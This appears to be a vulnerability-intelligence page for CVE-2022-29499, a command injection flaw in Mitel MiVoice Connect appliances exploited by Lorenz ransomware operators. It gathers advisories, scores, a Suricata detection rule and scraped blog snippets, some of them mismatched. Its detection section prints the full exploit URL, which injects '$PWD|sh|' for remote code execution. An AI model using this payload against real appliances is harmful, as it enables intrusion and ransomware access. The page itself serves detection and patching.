CVE-2022-29499
published 2022-04-26CVE-2022-29499: The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service…
PriorityP195critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWRansomware
CISA Known Exploited Vulnerabilitydue 2022-07-18
Exploited in the wild
EPSS
56.97%
98.9th percentile
The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service Appliances are SA 100, SA 400, and Virtual SA.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mitel | mivoice_connect | <= 22.20.2300.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
urlGET /scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:2.2.256.2/%24%50%57%44%7c%73%68%7c%3f HTTP/1.1↗
- →The exploit targets the `get_url` parameter in `/scripts/vtest.php` on Mitel MiVoice Connect appliances, chaining through `/ucbsync.php` with a `syncfile` command that injects shell commands via `$PWD|sh|?` to achieve RCE and establish a reverse shell. ↗
- →Threat actor performed anti-forensic wiping using `dd` to overwrite disk space and `rm` to delete files from the VOIP device filesystem after detection; look for `dd` writing to `/tmp/2` and mass `rm` activity on Mitel appliances. ↗
- →Post-exploitation tools Chisel and FileZilla were used by Lorenz actors for pivoting, tunneling, and data exfiltration after gaining initial access via CVE-2022-29499. ↗
- →Check Point IPS signature 'Mitel MiVoice Connect Command Injection (CVE-2022-29499)' can be used as a detection reference for network-level detection of exploit attempts. ↗
- →The responses to the outbound exploit requests demonstrated that the attacker used the exploit to create a reverse shell; monitor Mitel appliances for unexpected outbound connections following requests to `/scripts/vtest.php` or `/ucbsync.php`. ↗
- ·The IP addresses shown in the exploit log entries (1.1.256.1 and 2.2.256.2) are invalid/obfuscated addresses used in the CrowdStrike write-up for redaction purposes and are NOT real attacker infrastructure IOCs. ↗
- ·Affected products are specifically the Service Appliance (SA) components: SA 100, SA 400, and Virtual SA in Mitel MiVoice Connect through version 19.2 SP3; scope detection rules accordingly. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Mitel MiVoice Connect Data Validation Vulnerability
cisa·2022-06-27·CVSS 9.8
CVE-2022-29499 [CRITICAL] CWE-20 Mitel MiVoice Connect Data Validation Vulnerability
Vulnerability: Mitel MiVoice Connect Data Validation Vulnerability
Affected: Mitel MiVoice Connect
The Service Appliance component in Mitel MiVoice Connect allows remote code execution due to incorrect data validation.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2022-29499
Remediation Due Date: 2022-07-18
GHSA
GHSA-f4rg-w9qm-5f42: The Service Appliance component in Mitel MiVoice Connect through 19
ghsa_unreviewed·2022-04-27
CVE-2022-29499 [CRITICAL] CWE-20 GHSA-f4rg-w9qm-5f42: The Service Appliance component in Mitel MiVoice Connect through 19
The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service Appliances are SA 100, SA 400, and Virtual SA.
VulnCheck
Mitel MiVoice Connect Data Validation Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-29499 [CRITICAL] CWE-20 Mitel MiVoice Connect Data Validation Vulnerability
Mitel MiVoice Connect Data Validation Vulnerability
The Service Appliance component in Mitel MiVoice Connect allows remote code execution due to incorrect data validation.
Affected: Mitel MiVoice Connect
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/; https://therecord.media/ransomware-groups-targeting-mitel-voip-zero-day/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/; https://www.ivanti.com/resources/v/doc/pr-survey-report/ransomware-quarterly-indexreport_q2-q3; https://www.hhs.gov/sites/default/files/lorenz-analyst-note.pdf;
Suricata
ET EXPLOIT Attempted Mitel MiVoice Connect Data Validation RCE Inbound (CVE-2022-29499)
suricata·2022-06-24·CVSS 9.8
CVE-2022-29499 [CRITICAL] ET EXPLOIT Attempted Mitel MiVoice Connect Data Validation RCE Inbound (CVE-2022-29499)
ET EXPLOIT Attempted Mitel MiVoice Connect Data Validation RCE Inbound (CVE-2022-29499)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Attempted Mitel MiVoice Connect Data Validation RCE Inbound (CVE-2022-29499)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php?cmd=syncfile:db_files/"; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:url,www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/; reference:cve,2022-29499; classtype:attempted-admin; sid:2037121; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_06_24, cve CVE_2022_29499, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence High, signa
No public exploits indexed.
Sentinelone
Lorenz
blogs_sentinelone·2022-11-30
Lorenz
How It Works The Singularity XDR Difference
Singularity Marketplace One-Click Integrations to Unlock the Power of XDR
Pricing & Packaging Comparisons and Guidance at a Glance
Purple AI Accelerate SecOps with Generative AI
Singularity Hyperautomation Easily Automate Security Processes
AI-SIEM The AI SIEM for the Autonomous SOC
Singularity Data Lake AI-Powered, Unified Data Lake
Singularity Data Lake for Log Analytics Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
Singularity Endpoint Autonomous Prevention, Detection, and Response
Singularity XDR Native & Open Protection, Detection, and Response
Singularity RemoteOps Forensics Orchestrate Forensics at Scale
Singularity
Threat Intelligence Comprehensive Adversary Intelligence
Singularity Vulnerability Management
Checkpoint
19th September – Threat Intelligence Report
blogs_checkpoint·2022-09-19
CVE-2022-29499 19th September – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 19th September – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 19th September, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Uber has suffered a data breach, allegedly by an 18-year-old hacker who managed to gain access using social engineering tactics on an employee. The hacker claims to have access to Uber’s internal IT systems and to the company’s HackerOne bug bounty account, which contains vulnerabilities in Uber’s systems and apps, di
Checkpoint
27th June – Threat Intelligence Report
blogs_checkpoint·2022-06-27·CVSS 9.8
CVE-2022-29499 [CRITICAL] 27th June – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 27th June – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 27th June, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
A Chinese APT group dubbed Bronze Starlight (APT10) is attempting to use ransomware attacks mainly against Japanese companies, only as decoy to hide its true objectives – intellectual property theft and cyber espionage.
Check Point Threat Emulation provides protection against this threat (Ransomware.Win.Pandora.A)
The Russian
Sentinelone
Lorenz
blogs_sentinelone·CVSS 9.8
[CRITICAL] Lorenz
# Lorenz Ransomware: In-Depth Analysis, Detection, and Mitigation
## Summary of Lorenz Ransomware
In early 2021, Lorenz ransomware was first spotted. Since then, its features have developed to match those of other widely-known ransomware. Lorenz campaigns are highly-targeted, with payloads often tailored to their intended victims. The ransomware’s operators use a multi-pronged extortion method, hosting a blog with the names of victims and leaked data for those who don’t pay. It’s worth noting that victims’ names are posted on the blog as soon as data has been taken from the target system, regardless of whether payment is made or not.
## What Does Lorenz Ransomware Target?
Lorenz ransomware targets a variety of industries, including healthcare, finance, education, and government. Lorenz
Crowdstrike
Novel Exploit in Mitel VOIP Appliance
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] Novel Exploit in Mitel VOIP Appliance
How CrowdStrike is Accelerating Exposure Evaluation as Adversaries Gain Speed Apr 06, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How CrowdStrike is Accelerating Exposure Evaluation as Adversaries Gain Speed Apr 06, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand AT
2022-04-26
Published
2022-06-27
Added to CISA KEV
Exploited in the wild